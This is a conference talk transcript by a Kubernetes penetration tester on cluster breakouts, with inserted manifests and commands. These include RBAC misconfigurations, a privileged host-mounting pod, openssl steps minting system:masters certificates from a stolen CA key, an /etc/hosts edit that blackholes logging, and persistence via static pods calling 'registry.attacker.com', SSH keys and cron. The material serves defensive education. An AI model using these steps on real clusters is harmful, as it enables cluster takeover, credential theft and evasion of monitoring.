I will get started five minutes early because, knowing me, I'm probably going to go slightly over. Hopefully you're all here for an adventure in container security, breaking into Kubernetes clusters: this is "I'll Let Myself In". A very quick introduction. The astute among you may notice there's only one of me up here. Unfortunately Andy hasn't been able to join us today, so you're stuck with me for the next 35 minutes. I'm Ian, a security consultant at ControlPlane. I'm on the offensive security team, which means I get to say I'm offensive without actually offending people, I hope. I've spent the last five years in penetration testing, breaking into Kubernetes clusters, CI platforms, all things DevSecOps-y.

So hopefully you're all here to hear something like this. We'll talk briefly about what offsec is. Hopefully a bunch of you are familiar with it already; if not, we'll define why we do offensive security and why you need it. We'll talk about some common findings, we'll do some demos (hopefully without resorting to the recorded ones, we'll find out), and we'll talk a bit about post-compromise activities, an area I've seen a lot of people not pay much attention to. Then we'll do another demo, although I think my final demo might actually be broken, but we shall see.

At a very high level, the problem offensive security teams are trying to solve is that Kubernetes is complicated. I hope that isn't a shock to anyone; hopefully everyone knows it's not the easiest thing in the world to manage. And I don't just mean it's complicated. I mean, if you're an organization running Kubernetes or any of these orchestration systems, there are so many moving parts out there.
And I genuinely don't think most people know what all the parts do, how they work, or how they talk to each other. We see a lot of people deploying really complicated solutions to host a single web app, or to host something they don't really understand. They just go, right, this is the cool shiny thing, it's on Hacker News, let's use it. That leads to a lot of people running stuff without knowing what's happening.

There's also the rate of change. I think we're all familiar with the relentless release cycle of Kubernetes and the need to keep up to date, juggling constant patching against actually keeping things running and being able to ingest software fast enough. We see a lot of legacy organizations, places with more old-school software update procedures where it takes a year to get a new version of something in; by that time, you're four versions behind.

And the big one we really see is differing operational requirements. By that I mean, depending on your organization's structure, you might have different ways you want to run a cluster. We see people who use separate clusters for separate environments: prod, staging, non-prod. We also see people with one cluster trying to make the most of Kubernetes, playing that nice little game of Tetris with their hardware, thinking, well, let's just run everything on the same tin. Or people literally doing one cluster, one app, going completely overboard with the number of clusters they run. Trying to juggle that while maintaining some semblance of security is not necessarily the easiest thing in the world. So that's where offensive security comes in. We're basically doing attacker emulation.
We're doing what the bad guys do, but before they do it, hopefully. We're trying to break into clusters, thinking like a threat actor would, and trying to get into your clusters effectively. This should always be a collaborative engagement. The least satisfying engagements I've performed in the last few years are the ones where someone says, hey, we're going live on Monday, we need a pen test this week, make it happen right now, we've built everything, it's all ready to go, and you'd better not find anything because we're going live on Monday. Inevitably, those are the ones where you find a critical at 5pm on the Friday, the go-live gets blocked, and you're the bad guy. The more satisfying engagements are the ones where you work with developers and sysadmins and actually try to help each other out. Security don't want to be the bad guys, because if we get too nasty, people just stop involving security entirely. Then you get hacked, then you get huge fines, then everybody's sad.

One thing I would like to say: in my mind at least, offensive security and threat modelling are different things. Some people think threat modelling is the attacker's job. I would argue that threat modelling should be part of system design, and it should always ask, what's the worst thing that could possibly happen? Think about that before you start building anything.

So the first thing we would generally do, once you've decided, right, we've got something built and we'd like it looked at, is a pen test. And basically (sorry, this bottle doesn't fit on the shelf), let's try and break in. This is basically security QA. Instead of doing QA and checking that your app doesn't break when you put a letter where there should be a number, we're actively trying to break in.
We're network scanning everything, making sure you've not left anything open, that sort of thing. Ultimately, it's another form of QA. We can do an open-box configuration review: you give me all the access, we look at all the things. Or we can do closed-box, which is more representative: I've got nothing apart from an IP address, have fun, let's see what you can do. Obviously, the less access someone has, the more difficult it's going to be for them to find something, which might be a good thing, but it also means you're spending more money for fewer findings. And this tends to be noisy and obvious. A quick pen test is not going to try to avoid detection, it's not stealthy; it's going to set off every alert you have, assuming you've got logging.

But once you've done that, what should you be doing next? Repeating the same operations over and over is boring, and I know personally I've got fed up of doing the same config review of a very basic cluster. I compare it to when I used to do Windows Active Directory hacking: you get onto a network, you run Responder, you get some hashes, you run BloodHound, you get domain admin. You get bored of it very quickly because you do the same things. As a consultant, I'm looking for something more interesting to do. And if you just repeat the same engagement over and over, you're probably going to get the same findings, which is not the best value for money.

So, purple teaming. I don't know who's familiar with purple teaming as a concept, but this is something much more interesting to me: working with the team who are looking at the logs. I'm in your cluster doing nasty attacker things, working with you, making sure you can actually detect what I'm doing. And again, this has to be collaborative. It can't be: I do a job, and then three weeks later you go look through the logs.
This is really valuable for evaluating your response to an incident as well. It can be done tabletop, but it's more fun to do live: let me actually detonate a payload in your cluster, deploy something malicious. How quickly do your team pick it up? Do your team pick it up at all is quite often the first question we should be asking. But once you've done that, what's your time to respond? What's your playbook after something bad has happened?

One of the things I do like doing is an assumed-breach exercise. Let's assume a developer has been compromised: you give me developer credentials, I use them and try to escalate my permissions. Ironically, despite this talk being called "I'll Let Myself In", a lot of the time we do request to be let in the front door at least, basically because in a modern cluster there's probably not that much immediately accessible from the outside. If you're running a cluster with the insecure API exposed now, in 2024, you've probably got bigger problems (but you should also turn off that API). Some other attack vectors here: compromised credentials, compromised laptops, someone's been bribed, you've laid someone off and they've left, or you think they've left but actually they still have access, or someone's checked their credentials into GitHub, which we do still see every so often.

The sort of things we find regularly are almost always a misconfiguration rather than some super cool zero-day exploit. This might be my favorite slide I've ever written. A foot gun is defined as any feature whose addition to a product results in the user shooting themselves in the foot. Hopefully the admins amongst you won't be surprised that I'm going to follow this up with Kubernetes RBAC, because basically there are a lot of edge cases, a lot of weird interactions, and a lot of foot guns in there.
So there's a whole bunch of ways it can be misconfigured. This QR code is not a Rickroll; it takes you to the Kubernetes documentation on RBAC good practices, which is basically a list of ways various people in the community have seen Kubernetes misconfigured in ways that lead to privilege escalation.

The big one here to me is secrets get versus list. An awful lot of administrators assume (and I know this assumption gets made, because someone told me on an engagement the other day) that it's okay to give someone list permissions on secrets because it only returns the secret names and you can't get the contents. The difference in Kubernetes is that get retrieves a single value and list gets all of them. If you do kubectl get secrets -o yaml, you'll get the values of all of the secrets. Now, a lot of the time when people test this, they'll create a secret called test-secret, run kubectl get secret test-secret, and it'll say, hey, go away, you're not allowed to get that secret. And the admin goes, oh good, the RBAC check worked, I wasn't allowed to get that secret, exactly what I expected. Definitely not the case.

Pod creation is another fun one. Even if you ignore things like node breakouts, if you can create a pod and you know the name of a secret, you can just mount that secret into your pod. Then you can pipe it out: put it in environment variables, pipe that through base64, curl it out to a webhook, something like that.

And the other one I see regularly is the RBAC verb escalate, where people allow the RBAC star verb to an admin or a namespace user. People think star just means create, read, update, delete, and that's fine. But star also includes the escalate verb, which bypasses the check preventing a user from giving themselves permissions they don't already hold.
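Written out, these foot guns look deceptively innocent. A minimal sketch, assuming illustrative names (the demo namespace, secret name, and role names below are all made up):

```yaml
# List-vs-get foot gun: this Role looks read-limited, but "list" returns
# full secret objects, so "kubectl get secrets -o yaml" (a list call)
# dumps every value even though a named get is denied.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: looks-harmless
  namespace: demo
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["list"]          # no "get", but the contents still leak
---
# Pod-creation foot gun: anyone who can create pods and knows a
# secret's name can simply mount it and read it out.
apiVersion: v1
kind: Pod
metadata:
  name: secret-reader
  namespace: demo
spec:
  containers:
  - name: shell
    image: busybox
    command: ["sh", "-c", "cat /stolen/* ; sleep 3600"]
    volumeMounts:
    - name: stolen
      mountPath: /stolen
  volumes:
  - name: stolen
    secret:
      secretName: prod-db-credentials   # hypothetical secret name
---
# Wildcard foot gun: "*" on RBAC resources quietly includes the
# escalate and bind verbs, which bypass the check that normally stops
# a user granting permissions they do not already hold.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: namespace-admin
  namespace: demo
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["roles", "rolebindings"]
  verbs: ["*"]             # includes escalate and bind
```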
So if you give someone star on RBAC resources thinking it lets them create, read, update, and delete, it also lets them basically get cluster admin very, very quickly. I should say again, none of this is 0-day, none of this is super duper hacks. It's hacks, obviously, but it's all just misconfigurations in the system as it exists, which we should be able to demo if the Wi-Fi works.

I'm using Argo CD here as my demo of a CI pipeline feeding into a Kubernetes cluster. I should say, everything I'm about to demonstrate could happen in absolutely any CI system. It could also happen with standard developer access and direct kubectl access. This is absolutely not an issue in any particular platform; I just like having a nice web interface to show people stuff. So what I have here is a mouse that I can't find, because I can only see that screen behind me. I have a namespace running in my cluster and a very basic app set up: I'm deploying a deployment of nginx, and I've also deployed a role binding for the user developer to the cluster role view. So we can prove this access. This is going to look horrible on this screen, but it's the output of kubectl auth can-i --list, reviewing my own permissions, and it's saying: okay, I've got all the standard access of the view cluster role, nothing else. Just take my word for it; that's honestly what this is.

What I'm going to try to do is check a file into this Git repo: a cluster role binding to the cluster role cluster-admin. So I would like to give the developer user all of the access of cluster admin across the entire cluster. We'll do a git add, a git commit, and a git push. And I might need to authenticate with a key. Yes, I do. Really hoping that's actually anonymized and you can't see my password. So we should now see Argo pick this up. I'm really hoping this works; if not, I do have it recorded. There we go.
Now, there's a couple of things to note here. One is that the nginx deploy is actually failing at the moment. It's failing because, if I go into events, I'm working in a namespace labeled with the Pod Security Admission restricted profile, and I've not added any of the hardening needed for my nginx deployment to run under restricted. So I'm being told, basically, go away, you're not allowed to run this. The other thing I have (it's really hard to see where the cursor is on the far side of the screen) is an error in this deployment, because the Argo CD project I'm deploying in is configured to not allow cluster-wide resources. I'm only allowed to create namespaced ones, so I'm not allowed to create a cluster role binding. And that's a good thing, right? It means I can't assign myself, as a user, permissions across the entire cluster.

I'm just going to terminate this sync, because if I don't it hangs forever and it's really horrible, and then we'll do something else instead. I'll remove the cluster role binding and hopefully this syncs fairly quickly. Let's just close out and demo. Basically, I just need to be sure that's gone, otherwise future syncs don't work. There we go, that's gone. What I'm going to do now, instead of creating a cluster role binding, is have Argo create for me a role binding to the cluster role cluster-admin. So as you can see: developer user, role binding, cluster-admin. For those of you not aware, a role binding to a cluster role assigns all of the permissions that cluster role has, but only in a single namespace. So we can demonstrate this; it should deploy fairly quickly. I'm also really surprised this is actually running. I did wonder if I'd have to host some horrible git thing locally to make this work. So what we should see now is that the role binding has successfully been created.
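The manifest being synced here would look roughly like this; the names are the ones from the demo, so treat them as placeholders:

```yaml
# A namespaced RoleBinding to the built-in cluster-admin ClusterRole.
# It grants *.* but only inside this one namespace, so a
# "namespaced resources only" restriction in the CI tool does not
# catch it, even though "cluster-admin" appears in the roleRef.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: developer-ns-admin
  namespace: demo
subjects:
- kind: User
  name: developer
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
```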
So as the developer user I now have the permissions *.* in my own namespace. I'll demonstrate that with another kubectl auth can-i, and, effectively, somewhere up here, you can see at the top I've got *.*. That means I can do anything I want, but only in this one namespace. We'll also ignore that kubectl get pods error, because I've just realized why it's there; let's pretend it's not. I made last-minute changes to this and didn't re-run it. Slightly awkward. So, effectively, I have *.* in my own namespace.

This is an escalation I came across recently that genuinely surprised me, and it's working as intended, by design. If you have *.* in any namespace via a role binding (not a cluster role binding), you can modify the labels on that namespace. That's probably okay if you just want to label your namespace as, oh, this is my production namespace, or I've deployed this app. However, loads of Kubernetes security features now rely on namespace labels as a security boundary. One is network policies: allow access from a namespace with a certain label. Another is Pod Security Admission and the Pod Security Standards, which rely on labels on namespaces. So if I can modify the labels on my namespace, I can just say: right, forget what you said about this being a restricted namespace, use the privileged profile instead. So I've done that; I've relabeled my demo namespace. I'm now going to deploy something hopefully familiar to some of you in the audience: a manifest which basically turns off all of the security ever. It deploys a pod using the privileged security context. I'm using the nginx image just because it's got a load of tooling in it, but I'm also going to mount in a bunch of host resources, including the host filesystem and a couple of other bits. So I'll do a kubectl apply.
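The relabel-then-apply combination is roughly this, after first running kubectl label ns demo pod-security.kubernetes.io/enforce=privileged --overwrite (namespace and pod names here are just my demo's):

```yaml
# "Turn off all the security ever": privileged security context,
# host PID and network namespaces, and the node's root filesystem
# mounted at /host. Only admissible once the namespace has been
# relabeled out of the restricted PSA profile.
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
  namespace: demo
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: shell
    image: nginx            # any image with a shell and basic tooling
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
```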
This definitely would not have worked if I was running under Pod Security restricted; it would have been told, go away, not allowed. However, that pod has been created. I'm going to stall for about five seconds to make sure there's enough time for that image to pull before my next command, which is to exec into the container that was just created, still as the developer user with permissions in only one namespace, and cat from /host. This is actually the node the pod is running on, and this is the certificate authority that Kubernetes uses to sign all of its user certificates, among other things. And look at that: there's the key. With this access I can now mint my own certificates, which is not great, I hope you'd all agree. That's probably not a good thing to allow a random developer to do in your cluster. So there we go: we've had a namespace, and we've broken out. And what we should also see... ah, we haven't. I was wondering if that deployment would have spun up, but not yet.

So now that I've broken out, what would I do next? This is a really interesting conversation and, I hope, the most important message of this talk. Once I've broken out of my namespace, if I'm actually an attacker, what am I going to do? The answer is probably quite a lot. I'm definitely going to try to hide my tracks. If I've got admin, I'm probably going to try to disable any auditing, logging, and monitoring. So first of all: what are you actually auditing? Are you doing enough to detect me doing malicious things in your cluster? Can you pick me up in the first place? The chances are, if you've got auditing on, you've probably caught me doing something. But if I'm a committed attacker and I've thought about what I'm going to do once I get in, the first thing I'll do, if I can, is disable all of your auditing entirely. So I might change the system configuration to delete the auditing.
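As an aside, the cert minting that a stolen CA key enables is just standard openssl. This sketch runs offline: it generates a stand-in CA (on a kubeadm cluster the real pair sits under /etc/kubernetes/pki/), then signs a client cert in the system:masters group, which the API server treats as cluster admin and which cannot be revoked short of rotating the whole CA:

```shell
# Stand-in CA so the sketch runs offline; an attacker would use the
# stolen ca.crt/ca.key from the node instead.
openssl req -x509 -newkey rsa:2048 -nodes -keyout ca.key -out ca.crt \
  -subj "/CN=kubernetes" -days 365

# Mint a client certificate whose organization is system:masters;
# Kubernetes maps the cert's O field to group membership.
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key \
  -subj "/CN=attacker/O=system:masters" -out attacker.csr
openssl x509 -req -in attacker.csr -CA ca.crt -CAkey ca.key \
  -CAcreateserial -days 365 -out attacker.crt
```

The resulting attacker.key/attacker.crt pair can be dropped straight into a kubeconfig as client credentials.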
Or, one of my favorite tricks: if you're streaming your logs to an external source, sending them out to some remote logging solution, and you're doing that by hostname, I'll just change the value for your logging server in /etc/hosts to something that doesn't exist. At which point all of your logging goes, well, I can't get there anymore. And if you don't have a canary in your monitoring software to ask, have I still got logs, you probably won't even notice your logs have stopped. You definitely won't be able to tell what I've done after that point. There are also various endpoints, once I've got admin, that I could make use of which are not audited by default. An example: what if I start talking directly to the kubelets, or doing malicious things on a node, while you're only logging the Kubernetes API and not taking system logs from each of your nodes?

The other thing I really like to use as a thought exercise: if you've got an attacker in your cluster and you're an admin, can you get rid of them? I would argue the answer is probably no, not with any degree of certainty, unless you're absolutely able to completely lock down your entire cluster and everything it touches, which is quite a big ask for a production environment. If someone has got admin, they can mint their own certificates, they can compromise the nodes directly, there's a whole bunch of options. Let's go through some of them. I'm not going to list them all, because we would literally be here all day; this is a multi-day presentation if I try that. In Kubernetes, for example, I could mint user certificates, so I can just keep hold of my own and make my cert for system:masters. I could talk directly to etcd, because I've got access to the certificates it trusts. If I can talk directly to etcd... I almost want to do a show of hands.
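Before the show of hands: the /etc/hosts trick from a moment ago is a one-liner. This sketch works on a copy so it's safe to run; logs.example.internal stands in for whatever hostname your real log collector uses:

```shell
# Operate on a copy for the demo; an attacker would edit /etc/hosts
# on every node directly.
cp /etc/hosts hosts.copy

# 203.0.113.1 is TEST-NET-3: traffic sent there goes nowhere useful,
# so every log shipper resolving this name silently blackholes.
echo "203.0.113.1 logs.example.internal" >> hosts.copy
```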
Does anyone actually audit the calls that go between a node and etcd? I guarantee there are maybe two or three people in here who actually do that; most people won't. Crafting your own service account tokens. Creating some dodgy RBAC. Creating a workload in the static manifest directory, /etc/kubernetes/manifests: you can create workloads in there that are extremely difficult to find unless an admin goes in looking specifically in that location. You could also talk directly to the container runtime, and just say, right, don't create a pod, create another process running on the node. You could run a malicious admission controller, or a malicious operator that creates your persistence for you. So if I create a thing in the cluster that just goes, I always want one reverse shell back to Ian's dodgy server, please, and the admins ever recognize a node's been compromised and quarantine it, the operator itself might go, oh, I'll just make another one of those. That's fine.

And even if you remove all of the Kubernetes attacks, and we pretend serverless doesn't exist and Windows nodes don't exist, you've still got all the Linux persistence techniques. So, another QR code there (I will publish these slides later); the link takes you to the MITRE ATT&CK persistence techniques. Just to give an example of some of these: cron jobs on a node, so a task that runs regularly; dropping SSH keys on the node, so I just put my SSH key into the root user on all of the nodes and now I can SSH in directly; modifying the container runtime. One nasty thing someone might do is change the registry search order on your nodes so that instead of going to Docker Hub first, they go straight to something like registry.attacker.com and pull all your backdoored images from there.
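As one concrete example, a workload dropped into the static manifest directory is just an ordinary pod manifest that the kubelet runs directly, with no Deployment or ReplicaSet pointing at it. Something along these lines, with invented names throughout:

```yaml
# Placed on a node as /etc/kubernetes/manifests/kube-metrics-helper.yaml,
# the kubelet runs this with no controller owning it, so nothing in the
# usual kubectl get deployments view leads back to it.
apiVersion: v1
kind: Pod
metadata:
  name: kube-metrics-helper   # deliberately innocuous-looking name
  namespace: kube-system
spec:
  hostNetwork: true
  containers:
  - name: helper
    image: registry.attacker.com/helper:latest   # hypothetical registry
    command: ["sh", "-c", "while true; do /opt/callback.sh; sleep 60; done"]
```

Static pods do show up as mirror pods in the API (suffixed with the node name), but they can only be removed by deleting the file on the node itself.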
Potentially also doing things like implanting into cloud storage. I was having a conversation with a customer a while back and they said, oh, it's fine, we'll just detach all of our EBS volumes, spin up a new cluster, reattach the volumes. The problem is, if an attacker has got to the point of having root on every node, they're also going to be able to put stuff into your persistent storage. And if you take that storage across: sad times.

Very quickly, one more demo, which I really hope works. Hey, that deployment's worked, look, happy days. Well, that says it's happy; that says it's sad. I will check that later. What I'm doing now is copying a persistence.sh script into my dodgy pod, and I'm going to run that script, which does a few things very, very quickly. Or it's just going to fail. Let's do that manually: kubectl exec. So that script, which ran extremely quickly... in fact, let's just look at the script. That script dumped all of the secrets from the Kubernetes API (kubectl get secrets -A -o yaml into a file), grabbed the ca.key and ca.crt, and also grabbed /etc/kubernetes/admin.conf, because this is a kind cluster, which effectively runs kubeadm, so I've grabbed the hard-coded admin cert for that cluster, which is valid for at least a year in some deployments, possibly up to ten. It then added an SSH key to /root/.ssh/authorized_keys, and added a cron job to run something_dodgy.sh, which might be my favorite script. This all ran in about a second. My argument here is that these are just a few persistence mechanisms; I've not done loads. Oh, I was also trying to get it to send me something over a webhook, but the conference Wi-Fi just cried, so unfortunately I did not do that. The point here being: that ran exceptionally quickly.
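For a feel of the node-level half of that script, here's a stand-in pointed at a scratch directory so it's safe to run; a real attacker would write to /root/.ssh and /etc/cron.d on each node, and would add the kubectl secrets dump and CA grab alongside:

```shell
# Scratch directory standing in for the node's root filesystem.
NODE=./fake-node-root
mkdir -p "$NODE/root/.ssh" "$NODE/etc/cron.d"

# Drop an attacker SSH public key for direct node access later
# (the key material here is truncated and fake).
echo "ssh-ed25519 AAAAC3fake attacker@evil" \
  >> "$NODE/root/.ssh/authorized_keys"

# Cron entry that re-establishes access every minute, even if the
# original pod is found and killed.
echo "* * * * * root /tmp/something_dodgy.sh" \
  > "$NODE/etc/cron.d/system-helper"
```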
I would argue that the time from your cluster monitoring going, hey, something dodgy's happened, to a human being getting the alert, pulling out their phone, checking it, getting onto the laptop, and realizing what's happened... I don't think any organization can do that faster than that script ran. I would be amazed if you can. Let's face it: realistically, we're probably talking a minimum of half an hour, and realistically up to days. I had a customer ring me a while back and say, hey, we've just caught that DNS tunneling you're doing. That's fine, but the job was three weeks ago. All of that data left your organization three weeks ago, and you're now really proudly telling me you've caught it. Good job.

So the real takeaway from this: there are some cool breakouts you can do, and some cool persistence you can do. The thing I would like everyone to think about (because obviously we need a call to action) is: if you ever get an alert that says, hey, this canary token's triggered, or, hey, we've had horrible, horrible hacks happen against us, what would you do if you find evidence that an attacker has had cluster admin for even half an hour? Because I don't think a lot of organizations are in a position where they could genuinely recover from that very quickly, very easily, and with a high degree of certainty that they've actually got the attacker out. And the other thing to think about: if you're one of the organizations who has everything as infrastructure as code, and you can just delete all of your infrastructure and rebuild, that's fine. But what happens if you deploy the exact same stack, the exact same software, with the exact same entry point, and your attacker just does the exact same thing all over again?
Because the chances are, if a web app vulnerability was their entry point and you just go, oh, we'll deploy a clean cluster, they're just going to run ./something_dodgy.sh and be in the exact same position all over again. You also need to think about not just the Kubernetes cluster, but every credential stored in it. If an attacker has got in and dumped all your creds, they might have access to your on-prem identity provider if you're using some kind of OIDC authentication, they might have access directly to your databases, they might have cloud credentials. The blast radius of this can be fairly catastrophic, which again brings us back to: when you're designing and threat modelling, have a think about what is the worst that can happen. And I would really encourage everyone to think about what would happen if someone got admin. Or, what's your joiners-and-leavers process? It doesn't have to be an attacker: what if you sack an admin, and they had access before you got them out?

So that's it. I think I'm pretty much on time, having used a couple of extra minutes. Hopefully that was interesting. If you want to practice some of the stuff we've spoken about, we are running a capture the flag: a practice session tomorrow, and a live session on Friday. I would highly recommend, if you're interested in the offensive security stuff and you want a playground, come and join us in room W08. Hopefully I'll see some of you there, and thank you very much for listening.